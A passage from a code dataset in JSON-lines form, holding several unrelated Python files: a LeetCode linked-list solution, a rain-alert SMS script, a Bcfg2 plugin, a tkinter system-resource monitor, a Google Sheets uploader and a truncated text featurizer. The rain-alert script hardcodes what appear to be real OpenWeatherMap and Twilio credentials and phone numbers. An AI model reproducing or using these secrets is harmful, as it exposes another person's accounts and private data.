singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def swapPairs(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n #可以看做是遍历一遍,只是每此把遍历的这个结点的后两个交换下位置即可\n h = ListNode(-1)\n h.next = head\n pre = h\n # 如果后面有两个结点\n while pre.next and pre.next.next:\n p = pre.next\n q = p.next\n \n pre.next = q\n p.next = q.next\n q.next =p\n\n pre = p\n\n return h.next\n\n\n","repo_name":"Elroborn/LeetCode","sub_path":"24_两两交换链表中的节点/两两交换链表中的节点.py","file_name":"两两交换链表中的节点.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"71404153963","text":"import requests\nfrom twilio.rest import Client\n\n\n# \"lat\": 13.046396,\n# \"lon\": 77.723328,\n\nAPI = \"6940d199dd16f53e04bbc0f5896b6c44\"\naccount_sid = \"ACfb9a6b8aa9e4675b0d2abd5179828bb6\"\nauth_token = \"f4e0af510b8c63e2afd1ec3d042aa0c0\"\n\nparameters = {\n \"lat\": -12.462320,\n \"lon\": 130.840942,\n \"appid\": API,\n \"exclude\": \"current,minutely,daily\"\n}\n\n\nresponse = requests.get(\"https://api.openweathermap.org/data/2.5/onecall\", params=parameters)\nresponse.raise_for_status()\n\ndata = response.json()\nhourly_data = data[\"hourly\"]\n\n\nb = hourly_data[0][\"weather\"][0][\"id\"]\n\nweather_slice = data[\"hourly\"][:12]\n\nwill_rain = False\n\nfor x in weather_slice:\n code = x[\"weather\"][0][\"id\"]\n if code < 700:\n will_rain = True\n\nif will_rain:\n client = Client(account_sid, auth_token)\n message = client.messages \\\n .create(\n body=\"Bring Umbrella\",\n from_='+16165800849',\n to=\"+9189718 18410\"\n )\n\n print(\"Message Sent\")\n\n","repo_name":"aruneshkumar324/100-Days-Python","sub_path":"35-Day/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28380027519","text":"import lxml.etree\nimport re\n\nimport Bcfg2.Server.Plugin\n\n\nclass PackedDigitRange(object):\n def __init__(self, digit_range):\n self.sparse = list()\n self.ranges = list()\n for item in digit_range.split(','):\n if '-' in item:\n self.ranges.append(tuple([int(x) for x in item.split('-')]))\n else:\n self.sparse.append(int(item))\n\n def includes(self, other):\n iother = int(other)\n if iother in self.sparse:\n return True\n for (start, end) in self.ranges:\n if iother in range(start, end + 1):\n return True\n return False\n\n\nclass PatternMap(object):\n range_finder = '\\\\[\\\\[[\\d\\-,]+\\\\]\\\\]'\n\n def __init__(self, pattern, rangestr, groups):\n self.pattern = pattern\n self.rangestr = rangestr\n self.groups = groups\n if pattern != None:\n self.re = re.compile(pattern)\n self.process = self.process_re\n elif rangestr != None:\n self.process = self.process_range\n self.re = re.compile('^' + re.subn(self.range_finder, '(\\d+)',\n rangestr)[0])\n dmatcher = re.compile(re.subn(self.range_finder,\n '\\\\[\\\\[([\\d\\-,]+)\\\\]\\\\]',\n rangestr)[0])\n self.dranges = [PackedDigitRange(x) for x in dmatcher.match(rangestr).groups()]\n else:\n raise Exception\n\n def process_range(self, name):\n match = self.re.match(name)\n if not match:\n return None\n digits = match.groups()\n for i in range(len(digits)):\n if not self.dranges[i].includes(digits[i]):\n return None\n return self.groups\n\n def process_re(self, name):\n match = self.re.match(name)\n if not match:\n return None\n ret = list()\n sub = match.groups()\n for group in self.groups:\n newg = group\n for idx in range(len(sub)):\n newg = newg.replace('$%s' % (idx + 1), sub[idx])\n ret.append(newg)\n return ret\n\n\nclass PatternFile(Bcfg2.Server.Plugin.SingleXMLFileBacked):\n __identifier__ = None\n\n def __init__(self, filename, fam):\n Bcfg2.Server.Plugin.SingleXMLFileBacked.__init__(self, filename, fam)\n self.patterns = []\n\n def Index(self):\n Bcfg2.Server.Plugin.SingleXMLFileBacked.Index(self)\n self.patterns = []\n for entry in self.xdata.xpath('//GroupPattern'):\n try:\n groups = [g.text for g in entry.findall('Group')]\n for pat_ent in entry.findall('NamePattern'):\n pat = pat_ent.text\n self.patterns.append(PatternMap(pat, None, groups))\n for range_ent in entry.findall('NameRange'):\n rng = range_ent.text\n self.patterns.append(PatternMap(None, rng, groups))\n except:\n self.logger.error(\"GroupPatterns: Failed to initialize pattern \"\n \"%s\" % entry.get('pattern'))\n\n def process_patterns(self, hostname):\n ret = []\n for pattern in self.patterns:\n try:\n gn = pattern.process(hostname)\n if gn is not None:\n ret.extend(gn)\n except:\n self.logger.error(\"GroupPatterns: Failed to process pattern %s \"\n \"for %s\" % (pattern.pattern, hostname),\n exc_info=1)\n return ret\n\n\nclass GroupPatterns(Bcfg2.Server.Plugin.Plugin,\n Bcfg2.Server.Plugin.Connector):\n name = \"GroupPatterns\"\n experimental = True\n\n def __init__(self, core, datastore):\n Bcfg2.Server.Plugin.Plugin.__init__(self, core, datastore)\n Bcfg2.Server.Plugin.Connector.__init__(self)\n self.config = PatternFile(self.data + '/config.xml',\n core.fam)\n\n def get_additional_groups(self, metadata):\n return self.config.process_patterns(metadata.hostname)\n","repo_name":"solj/bcfg2-old","sub_path":"src/lib/Server/Plugins/GroupPatterns.py","file_name":"GroupPatterns.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"2095948823","text":"import platform\nimport psutil\nimport datetime\nimport sys\nimport os\nfrom datetime import date,datetime\nimport matplotlib.pyplot as plt\nimport tkinter as tk\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\nimport matplotlib\nfrom PIL.ImageTk import PhotoImage\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nfrom matplotlib.figure import Figure\nimport matplotlib.animation as animation\nfrom matplotlib import style\nmatplotlib.use(\"TkAgg\")\n\nLARGE_FONT = (\"Verdana\", 12)\nNORMAL_FONT = (\"Verdana\", 10)\nstyle.use(\"dark_background\")\n\n\nTURN = 0\ndef increment():\n \"\"\"\n Function that is basically incrementing\n the clock (TURN in our case) that says\n how many seconds have passed since the\n launch of the app\n :return:\n \"\"\"\n global TURN\n TURN = TURN+1\n\n\ndef get_size(bytes, suffix=\"B\"):\n \"\"\"\n Scale bytes to its proper format\n Keyword arguments:\n bytes -- bytes that we want to convert to Kb,Mb,Gb,Tb,Pb\n suffix -- what to add at the end of conversion not just K,M,G,T,P (default B)\n e.g:\n 1253656 => '1.20MB'\n 1253656678 => '1.17GB'\n \"\"\"\n factor = 1024\n for unit in [\"\", \"K\", \"M\", \"G\", \"T\", \"P\"]:\n if bytes < factor:\n return f\"{bytes:.2f}{unit}{suffix}\"\n bytes /= factor\n\n\ndef system_info():\n \"\"\"\n Function that gathers the information about the current system\n :return:\n \"\"\"\n uname = platform.uname()\n systemN = uname.system\n nodeN = uname.node\n releaseN = uname.release\n versionN = uname.version\n machineN = uname.machine\n processorN = uname.processor\n # Boot Time\n bootTimeTstmp = psutil.boot_time()\n bt = datetime.fromtimestamp(bootTimeTstmp)\n\n\ndef clean_cache():\n \"\"\"\n Function called everytime we start the app to clear\n the contents of every SampleData file\n :return:\n \"\"\"\n fileCPU = open(\"SampleDataCPU.txt\", \"w\")\n fileMem = open(\"SampleDataMemory.txt\", \"w\")\n fileSwap = open(\"SampleDataSwap.txt\", \"w\")\n fileNet = open(\"SampleDataNetwork.txt\", \"w\")\n fileDisk = open(\"SampleDataDisk.txt\", \"w\")\n\n\ncores_init={}\ncore_percentage_init = psutil.cpu_percent()\ndef cpu_info():\n \"\"\"\n Function that gathers the info about the cpu\n and storing the percentage in the SampleData\n :return:\n \"\"\"\n # prepare the file with the data\n f = open(\"SampleDataCPU.txt\", \"a\")\n # number of cores\n # cpuCountP = psutil.cpu_count(logical=False) #Physical number of cores\n # cpuCountT = psutil.cpu_count(logical=True) #Total number of cores\n\n # CPU frequencies\n # cpufreq = psutil.cpu_freq()\n # freqMax = cpufreq.max\n # freqMin = cpufreq.min\n # freqCurr = cpufreq.current\n\n # CPU usage\n # print(\"CPU Usage Per Core:\")\n cores = {}\n i = TURN + 1\n # if i % 120 == 0:\n # clean_cache()\n totalCpup= psutil.cpu_percent()\n f.write(str(i)+\",\"+str(totalCpup)+\"\\n\")\n if TURN == 0:\n cores_init = cores\n # for j, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):\n # cores[j] = percentage\n # print(f\"Core {j}: {cores[j]}%\")\n\n\nmem_init = psutil.virtual_memory()\nswap_init = psutil.swap_memory()\ndef memory_info():\n \"\"\"\n Function that gathers the info about the memory usage\n and swapt memory usage\n Storing it in the SampleData\n :return:\n \"\"\"\n # prepare the file with the data\n fileMem = open(\"SampleDataMemory.txt\", \"a\")\n i = TURN + 1\n # get the memory details\n svmem = psutil.virtual_memory()\n # totalMem = get_size(svmem.total)\n # availableMem = get_size(svmem.available)\n # usedMem = get_size(svmem.used)\n percentageMem = svmem.percent\n fileMem.write(str(i) + \",\" + str(percentageMem) + \"\\n\")\n\n # prepare the file with the data\n fileSwap = open(\"SampleDataSwap.txt\", \"a\")\n # get the swap memory details (if exists)\n swap = psutil.swap_memory()\n # totalSwap = get_size(swap.total)\n # freeSwap = get_size(swap.free)\n # usedSwap = get_size(swap.used)\n percentageSwap = swap.percent\n fileSwap.write(str(i) + \",\" + str(percentageSwap) + \"\\n\")\n\n\npartitions_init = psutil.disk_partitions()\ndef disk_info():\n \"\"\"\n Function that gathers the info about the disk usage\n of every partition in the system\n :return:\n \"\"\"\n fileDisk = open(\"SampleDataDisk.txt\", \"a\")\n i=TURN+1\n # get all disk partitions\n partitions = psutil.disk_partitions()\n for partition in partitions:\n partitionDevice = partition.device\n partitionMountPoint = partition.mountpoint\n partitionFstype = partition.fstype\n try:\n partition_usage = psutil.disk_usage(partition.mountpoint)\n except PermissionError:\n # this can be catched due to the disk that\n # isn't ready\n continue\n sizeDiskT = get_size(partition_usage.total)\n sizeDiskU = get_size(partition_usage.used)\n sizeDiskF = get_size(partition_usage.free)\n sizeDiskP = partition_usage.percent\n fileDisk.write(str(i) + \",\" + str(partitionDevice) + str(sizeDiskU) + \",\" + str(partitionDevice) + str(sizeDiskF) + \",\" + str(sizeDiskP) + \"%\" + \"\\n\")\n\n # get IO statistics sTURNe boot\n disk_io = psutil.disk_io_counters()\n totalReadDisk = get_size(disk_io.read_bytes)\n totalWriteDisk = get_size(disk_io.write_bytes)\n\n\nnet_io_init = psutil.net_io_counters()\ndef network_info():\n \"\"\"\n Function that gathers the info about the network usage\n and storing it in the SampleData\n :return:\n \"\"\"\n # prepare the file with the data\n fileMem = open(\"SampleDataNetwork.txt\", \"a\")\n i = TURN + 1\n\n # get IO statistics since boot\n net_io = psutil.net_io_counters()\n totalBytesS = get_size(net_io.bytes_sent)\n totalBytesR = get_size(net_io.bytes_recv)\n fileMem.write(str(i)+\",\"+str(totalBytesS) + \",\" + str(totalBytesR) + \"\\n\")\n\n\nclean_cache()\nsystem_info()\ncpu_info()\nmemory_info()\ndisk_info()\nnetwork_info()\n\n\nf = plt.figure(constrained_layout = True)\ngs = f.add_gridspec(3,3)\ncpuPlot = f.add_subplot(gs[0, :])\nmemPlot = f.add_subplot(gs[1, :-1])\nswapPlot = f.add_subplot(gs[-1, 0])\nnetPlotS = f.add_subplot(gs[1:, -1])\nnetPlotR = f.add_subplot(gs[-1, -2])\n\n\ndef animate(i):\n \"\"\"\n Function that function as the frames for the plots\n so that they are live data\n The function reads for every plot from the specified\n file and everytime this function is called the functions\n specific to adding data in the files are called, we also\n increment the seconds that have passed since the launch of the app\n with increment()\n Keyword arguments:\n i -- variable used by the FuncAnimation\n :return:\n \"\"\"\n increment()\n cpu_info()\n memory_info()\n network_info()\n disk_info()\n\n pullDataCPU = open(\"SampleDataCPU.txt\", \"r\").read()\n dataListCPU = pullDataCPU.split('\\n')\n xListCPU = []\n yListCPU = []\n for eachLine in dataListCPU:\n if len(eachLine) > 1:\n xcpu, ycpu = eachLine.split(',')\n xListCPU.append(int(xcpu))\n yListCPU.append(float(ycpu))\n cpuPlot.clear()\n cpuPlot.plot(xListCPU, yListCPU)\n\n\n pullDataMem = open(\"SampleDataMemory.txt\", \"r\").read()\n dataListMem = pullDataMem.split('\\n')\n xListMem = []\n yListMem = []\n for eachLine in dataListMem:\n if len(eachLine) > 1:\n xmem, ymem = eachLine.split(',')\n xListMem.append(int(xmem))\n yListMem.append(float(ymem))\n memPlot.clear()\n memPlot.plot(xListMem,yListMem)\n\n pullDataSwap = open(\"SampleDataSwap.txt\", \"r\").read()\n dataListSwap = pullDataSwap.split('\\n')\n xListSwap = []\n yListSwap = []\n for eachLine in dataListSwap:\n if len(eachLine) > 1:\n xswap, yswap = eachLine.split(',')\n xListSwap.append(int(xswap))\n yListSwap.append(float(yswap))\n swapPlot.clear()\n swapPlot.plot(xListSwap,yListSwap)\n\n\n pullDataNet = open(\"SampleDataNetwork.txt\", \"r\").read()\n dataListNet = pullDataNet.split('\\n')\n xListNet = []\n yListNetS = []\n yListNetR = []\n for eachLine in dataListNet:\n if len(eachLine) > 1:\n xnet, ynets, ynetr= eachLine.split(',')\n xListNet.append(int(xnet))\n yListNetS.append(ynets[:len(ynets)-2])\n yListNetR.append(ynetr[:len(ynetr)-2])\n\n netPlotR.clear()\n netPlotS.clear()\n netPlotR.plot(xListNet, yListNetR)\n netPlotS.plot(xListNet, yListNetS)\n\n #Setting the name of every plot and the axes of every plot\n cpuPlot.set_title('CPU Percentage')\n cpuPlot.set_xlabel('Time(s)')\n cpuPlot.set_ylabel('Usage(%)')\n memPlot.set_title('Memory Percentage')\n memPlot.set_xlabel('Time(s)')\n memPlot.set_ylabel('Usage(%)')\n swapPlot.set_title('Swap Mem Usage')\n swapPlot.set_xlabel('Time(s)')\n swapPlot.set_ylabel('Usage(%)')\n netPlotS.set_title('Network Received')\n netPlotS.set_xlabel('Time(s)')\n netPlotS.set_ylabel('Size sent(Gb)')\n netPlotR.set_title('Network Sent')\n netPlotR.set_xlabel('Time(s)')\n netPlotR.set_ylabel('Size received(Mb)')\n\n\ndef save_chart():\n partitionsName = []\n partitionsSize = []\n totalSizeGB = 0\n partitions = psutil.disk_partitions()\n for partition in partitions:\n partitionDevice = partition.device\n partitionsName.append(partitionDevice)\n try:\n partition_usage = psutil.disk_usage(partition.mountpoint)\n except PermissionError:\n # this can be catched due to the disk that\n # isn't ready\n continue\n sizeDiskT = get_size(partition_usage.total)\n sizeDiskU = get_size(partition_usage.used)\n partitionsSize.append(sizeDiskU)\n totalSizeGB += float(partition_usage.total)\n\n totalSize = float(get_size(totalSizeGB)[:len(get_size(totalSizeGB)) - 2])\n partitionsS = []\n used = 0\n for partition in partitionsSize:\n partitionsS.append(float(partition[:len(partition) - 2]))\n for j in range(0, len(partitionsS)):\n used += partitionsS[j]\n partitionsName.append(\"Free Space\")\n partitionsS.append(totalSize - used)\n explode = (0, 0, 0, 0.1)\n fig1, ax1 = plt.subplots()\n colors = ['#ff9999', '#66b3ff', '#99ff99', '#ffcc99']\n patches, texts, autotexts = ax1.pie(partitionsS, explode=explode, labels=partitionsName, colors=colors,\n autopct='%1.1f%%',\n shadow=False, startangle=90)\n for text in texts:\n text.set_color('grey')\n for autotext in autotexts:\n autotext.set_color('grey')\n ax1.axis('equal')\n plt.tight_layout()\n fig1.savefig('pie_chart.jpg', dpi=300, transparent=True)\n\n\ndef history(controller):\n \"\"\"\n Writes a file(or if it exists in the file)\n with data of the system that was at the start of the application\n and when the user presses the button \"Save data & exit\"\n :param controller: used for returning the user to the StartPage\n :return:\n \"\"\"\n end = datetime.now()\n ani.event_source.stop()\n save_chart()\n # try to open the history file if not create it\n f = open(\"history.txt\",\"a\")\n # -----------------System-----------------\n uname = platform.uname()\n bootTimeTstmp = psutil.boot_time()\n bt = datetime.fromtimestamp(bootTimeTstmp)\n f.write(\"---------System Info---------\\n\")\n f.write(f\"System:\" + str(uname.system) + \"\\n\")\n f.write(f\"Node Name: {uname.node}\\n\")\n f.write(f\"Release: {uname.release}\\n\")\n f.write(f\"Version: {uname.version}\\n\")\n f.write(f\"Machine: {uname.machine}\\n\")\n f.write(f\"Processor: {uname.processor}\\n\")\n f.write(f\"Boot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}\\n\")\n # -----------------System-----------------\n # ----------------- CPU -----------------\n cpuCountP = psutil.cpu_count(logical=False) # Physical number of cores\n cpuCountT = psutil.cpu_count(logical=True) # Total number of cores\n # CPU frequencies\n cpufreq = psutil.cpu_freq()\n freqMax = cpufreq.max\n freqMin = cpufreq.min\n freqCurr = cpufreq.current\n f.write(\"---------CPU Info---------\\n\")\n f.write(f\"Number of physical cores: {cpuCountP}\\n\")\n f.write(f\"Total number of cores: {cpuCountT}\\n\")\n f.write(f\"Maximum frequency: {freqMax}\\n\")\n f.write(f\"Minimum frequency: {freqMin}\\n\")\n f.write(f\"Current frequency: {freqCurr}\\n\")\n # ----------------- CPU -----------------\n # append the data from the start and the end of the execution\n f.write(\"\\n\")\n f.write(f\"--------- {start.year}/{start.month}/{start.day} {start.hour}:{start.minute}:{start.second} ---------\\n\")\n\n # -------CPU--------\n f.write(\"\\n\")\n f.write(f\"####CPU####\\n\")\n for j, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):\n cores_init[j] = percentage\n f.write(f\"Core {j}: {cores_init[j]}%\\n\")\n f.write(f\"Total core percentage start: {core_percentage_init}%\\n\")\n # -------CPU--------\n\n # -------Memory-------\n f.write(\"\\n\")\n f.write(f\"####MEMORY####\\n\")\n totalMem= get_size(mem_init.total)\n availableMem= get_size(mem_init.available)\n usedMem= get_size(mem_init.used)\n percentageMem= mem_init.percent\n f.write(f\"Total memory: {totalMem}\\n\")\n f.write(f\"Available memory: {availableMem}\\n\")\n f.write(f\"Used memory: {usedMem}\\n\")\n f.write(f\"Percentage used memory start:{percentageMem}\\n\")\n f.write(f\"####SWAP MEMORY####\\n\")\n totalSwap = get_size(swap_init.total)\n freeSwap = get_size(swap_init.free)\n usedSwap = get_size(swap_init.used)\n f.write(f\"Total swap memory: {totalSwap}\\n\")\n f.write(f\"Available swap memory: {freeSwap}\\n\")\n f.write(f\"Used swap memory: {usedSwap}\\n\")\n f.write(f\"Percentage used swap memory: {swap_init.percent}\\n\")\n # -------Memory-------\n\n # -------Disk-------\n f.write(\"\\n\")\n f.write(f\"####DISK SPACE####\\n\")\n f.write(f\"Partitions and Usage:\\n\")\n partitions_init = psutil.disk_partitions()\n for partition in partitions_init:\n partitionDevice = partition.device\n partitionMountPoint = partition.mountpoint\n partitionFstype = partition.fstype\n f.write(f\"=== Device: {partitionDevice} ===\\n\")\n f.write(f\" Mountpoint: {partitionMountPoint}\\n\")\n f.write(f\" File system type: {partitionFstype}\\n\")\n try:\n partition_usage = psutil.disk_usage(partition.mountpoint)\n except PermissionError:\n # this can be catched due to the disk that\n # isn't ready\n continue\n sizeDiskT = get_size(partition_usage.total)\n sizeDiskU = get_size(partition_usage.used)\n sizeDiskF = get_size(partition_usage.free)\n sizeDiskP = partition_usage.percent\n f.write(f\" Total Size: {sizeDiskT}\\n\")\n f.write(f\" Used: {sizeDiskU}\\n\")\n f.write(f\" Free: {sizeDiskF}\\n\")\n f.write(f\" Percentage: {sizeDiskP}%\\n\")\n disk_io = psutil.disk_io_counters()\n totalReadDisk = get_size(disk_io.read_bytes)\n totalWriteDisk = get_size(disk_io.write_bytes)\n f.write(f\"Total read: {totalReadDisk}\\n\")\n f.write(f\"Total write: {totalWriteDisk}\\n\")\n # -------Disk-------\n\n # -------Network-------\n f.write(\"\\n\")\n f.write(f\"####NETWORK USAGE####\\n\")\n totalBytesS = get_size(net_io_init.bytes_sent)\n totalBytesR = get_size(net_io_init.bytes_recv)\n f.write(f\"Total bytes sent: {totalBytesS}\\n\")\n f.write(f\"Total bytes received: {totalBytesR}\\n\")\n # -------Network-------\n f.write(\"\\n\")\n\n # ------------------------------------------------------------------------------------------------------------------\n f.write(f\"--------- {end.year}/{end.month}/{end.day} {end.hour}:{end.minute}:{end.second} ---------\\n\")\n # -------CPU--------\n f.write(\"\\n\")\n f.write(f\"####CPU####\\n\")\n cores = {}\n totalCpup = psutil.cpu_percent()\n for j, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):\n cores[j] = percentage\n f.write(f\"Core {j}: {cores[j]}%\\n\")\n f.write(f\"Total core percentage start: {totalCpup}%\\n\")\n # -------CPU--------\n\n # -------Memory-------\n f.write(\"\\n\")\n f.write(f\"####MEMORY####\\n\")\n svmem = psutil.virtual_memory()\n totalMem = get_size(svmem.total)\n availableMem = get_size(svmem.available)\n usedMem = get_size(svmem.used)\n percentageMem = svmem.percent\n f.write(f\"Total memory: {totalMem}\\n\")\n f.write(f\"Available memory: {availableMem}\\n\")\n f.write(f\"Used memory: {usedMem}\\n\")\n f.write(f\"Percentage used memory start:{percentageMem}\\n\")\n f.write(f\"####SWAP MEMORY####\\n\")\n swap = psutil.swap_memory()\n totalSwap = get_size(swap.total)\n freeSwap = get_size(swap.free)\n usedSwap = get_size(swap.used)\n f.write(f\"Total swap memory: {totalSwap}\\n\")\n f.write(f\"Available swap memory: {freeSwap}\\n\")\n f.write(f\"Used swap memory: {usedSwap}\\n\")\n f.write(f\"Percentage used swap memory: {swap.percent}\\n\")\n # -------Memory-------\n\n # -------Disk-------\n f.write(\"\\n\")\n f.write(f\"####DISK SPACE####\\n\")\n f.write(f\"Partitions and Usage:\\n\")\n partitions = psutil.disk_partitions()\n for partition in partitions:\n partitionDevice = partition.device\n partitionMountPoint = partition.mountpoint\n partitionFstype = partition.fstype\n f.write(f\"=== Device: {partitionDevice} ===\\n\")\n f.write(f\" Mountpoint: {partitionMountPoint}\\n\")\n f.write(f\" File system type: {partitionFstype}\\n\")\n try:\n partition_usage = psutil.disk_usage(partition.mountpoint)\n except PermissionError:\n # this can be catched due to the disk that\n # isn't ready\n continue\n sizeDiskT = get_size(partition_usage.total)\n sizeDiskU = get_size(partition_usage.used)\n sizeDiskF = get_size(partition_usage.free)\n sizeDiskP = partition_usage.percent\n f.write(f\" Total Size: {sizeDiskT}\\n\")\n f.write(f\" Used: {sizeDiskU}\\n\")\n f.write(f\" Free: {sizeDiskF}\\n\")\n f.write(f\" Percentage: {sizeDiskP}%\\n\")\n disk_io = psutil.disk_io_counters()\n totalReadDisk = get_size(disk_io.read_bytes)\n totalWriteDisk = get_size(disk_io.write_bytes)\n f.write(f\"Total read: {totalReadDisk}\\n\")\n f.write(f\"Total write: {totalWriteDisk}\\n\")\n # -------Disk-------\n\n # -------Network-------\n f.write(\"\\n\")\n f.write(f\"####NETWORK USAGE####\\n\")\n net_io=psutil.net_io_counters()\n totalBytesS = get_size(net_io.bytes_sent)\n totalBytesR = get_size(net_io.bytes_recv)\n f.write(f\"Total bytes sent: {totalBytesS}\\n\")\n f.write(f\"Total bytes received: {totalBytesR}\\n\")\n # -------Network-------\n\n f.write(f\"######################################################################################################\")\n f.write(\"\\n\\n\\n\")\n controller.show_frame(StartPage)\n\n\nstart = datetime.now()\n\n\ndef stop_animation():\n \"\"\"\n Stops the current plot animation that is running\n \"\"\"\n ani.event_source.stop()\n\n\ndef restart_program():\n \"\"\"\n Restarts the current program.\n \"\"\"\n python = sys.executable\n os.execl(python, python, * sys.argv)\n\n\nclass GuiResourceMonitor(tk.Tk):\n \"\"\"\n Main class used for configuring tkinter and its pages\n \"\"\"\n def __init__(self):\n\n tk.Tk.__init__(self)\n container = tk.Frame(self)\n\n container.pack(side=\"top\", fill=\"both\", expand=True)\n\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n\n for F in (StartPage, PageOne):\n\n frame = F(container, self)\n\n self.frames[F] = frame\n\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n self.show_frame(StartPage)\n\n def show_frame(self, cont):\n frame = self.frames[cont]\n frame.tkraise()\n\n\nclass StartPage(tk.Frame):\n \"\"\"\n First page with the static info about the system\n \"\"\"\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n label = ttk.Label(self, text=\"Resource Monitor\", font=LARGE_FONT)\n label.pack(pady=10, padx=10)\n\n button1 = ttk.Button(self, text=\"See the live data\", command=lambda: controller.show_frame(PageOne))\n button1.pack(side=tk.BOTTOM,padx=20,pady=20)\n # -----------------System-----------------\n uname = platform.uname()\n bootTimeTstmp = psutil.boot_time()\n bt = datetime.fromtimestamp(bootTimeTstmp)\n # ----------------- CPU -----------------\n cpuCountP = psutil.cpu_count(logical=False) # Physical number of cores\n cpuCountT = psutil.cpu_count(logical=True) # Total number of cores\n # CPU frequencies\n cpufreq = psutil.cpu_freq()\n freqMax = cpufreq.max\n freqMin = cpufreq.min\n freqCurr = cpufreq.current\n\n label1 = ttk.Label(self, text=\"---------System Info---------\\n\"\n + \"System: \" + str(uname.system)+\"\\n\"\n + \"Node Name: \"+str(uname.node)+\"\\n\"\n + \"Release: \"+str(uname.release)+\"\\n\"\n + \"Version: \"+str(uname.version)+\"\\n\"\n + \"Machine: \"+str(uname.machine)+\"\\n\"\n + \"Processor: \"+str(uname.processor)+\"\\n\"\n + \"---------CPU Info---------\\n\"\n + \"Number of physical cores:\"+str(cpuCountP)+\"\\n\"\n + \"Total number of cores:\"+str(cpuCountT)+\"\\n\"\n + \"Maximum frequency:\"+str(freqMax)+\"\\n\"\n + \"Minimum frequency:\"+str(freqMin)+\"\\n\"\n + \"Current frequency:\"+str(freqCurr)+\"\\n\", font=LARGE_FONT)\n label1.pack()\n\n # load = Image.open(\"pie_chart.jpg\")\n # render = ImageTk.PhotoImage(load)\n # img = tk.Label(self, image=render)\n # img.image = render\n # img.pack()\n\n\nclass PageOne(tk.Frame):\n \"\"\"\n Second page with the live plots\n \"\"\"\n def __init__(self, parent, controller):\n tk.Frame.__init__(self,parent)\n label = ttk.Label(self, text=\"Live data Resource Page\", font=LARGE_FONT)\n label.pack(pady=10, padx=10)\n\n button2 = ttk.Button(self, text=\"Save data & Exit\", command=lambda: history(controller))\n button2.pack(side=tk.BOTTOM,padx=10,pady=10, anchor=tk.S)\n\n button3 = ttk.Button(self, text=\"Stop running\", command=lambda: stop_animation())\n button3.pack(side=tk.TOP,padx=10,pady=10, anchor=tk.S)\n\n canvas = FigureCanvasTkAgg(f, self)\n canvas.draw()\n canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand= True)\n\n toolbar = NavigationToolbar2Tk(canvas, self)\n toolbar.update()\n canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n\n\napp = GuiResourceMonitor()\nani = animation.FuncAnimation(f, animate, interval=900)\napp.mainloop()","repo_name":"MateiRadu0499/GUI-Resource-Monitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38956408200","text":"from Dicts import mentors_dict\n\nimport httplib2\nimport apiclient.discovery\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nmain_dict = {}\n\n\nCREDENTIALS_FILE = 'creds.json'\nspreadsheet_id = '1Nz_VX7fYU2O_TuM2XtmIRHlvmJofUkD5BnR5tkyw5so'\nspreadsheet_id2 = '1wS0KsOqhX6mf-pPqiisWVaB3hKaiKtj8QwiQnLbJPR8'\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\n CREDENTIALS_FILE,\n ['https://www.googleapis.com/auth/spreadsheets',\n 'https://www.googleapis.com/auth/drive'])\nhttpAuth = credentials.authorize(httplib2.Http())\nservice = apiclient.discovery.build('sheets', 'v4', http=httpAuth)\nlist = []\nfor i in mentors_dict:\n list.append(mentors_dict[i])\n\nresults = service.spreadsheets().values().batchUpdate(spreadsheetId=spreadsheet_id, body={\n \"valueInputOption\": \"USER_ENTERED\",\n \"data\": [\n {\"range\": \"Лист2!A1:A30\",\n \"majorDimension\": \"COLUMNS\",\n \"values\": [list]},\n ]\n }).execute()","repo_name":"user058572/TgBot","sub_path":"Downloads/TrackerBot3/TrackerBot/Tg Bot/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5781907875","text":"\nimport pickle as pkl\nimport json\nimport numpy as np\nimport os\nimport pandas as pd\n\nfrom scipy.sparse import hstack\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom transformers import BertTokenizer\n\nfrom hierarchy import map_to_max_level\nfrom modify_spelling import modify_spelling\nfrom utils import get_metrics\n\n\ndef featurize_column(column, threshold_length_features=None, **kwargs):\n vec = CountVectorizer(**kwargs).fit(column)\n features = vec.transform(column)\n names = vec.get_feature_names()\n if threshold_length_features is not None:\n index = [idx for idx, name in enumerate(names) if len(name) >= threshold_length_features]\n features, names = features[:, index], [names[idx] for idx in index]\n return features, names\n\n\ndef tokenize_column(column, tokenizer):\n return column.apply(lambda row: ' '.join(tokenizer.tokenize(row)))\n\n\ndef process_data(df, tokenizer):\n joined = [\n 'title_supplement', 'summary',\n 'title_continuing_resource', 'work_info',\n 'work_title','expression_info',\n 'expression_title', \n 'RVK_j', \n 'keyword', 'keyword_loc']\n\n joined_features, joined_names = featurize_column(\n tokenize_column(df[joined].fillna('').apply(' '.join, axis=1), tokenizer),\n # token_pattern=r\"[^\\| ]+\", \n max_features=5000)\n\n 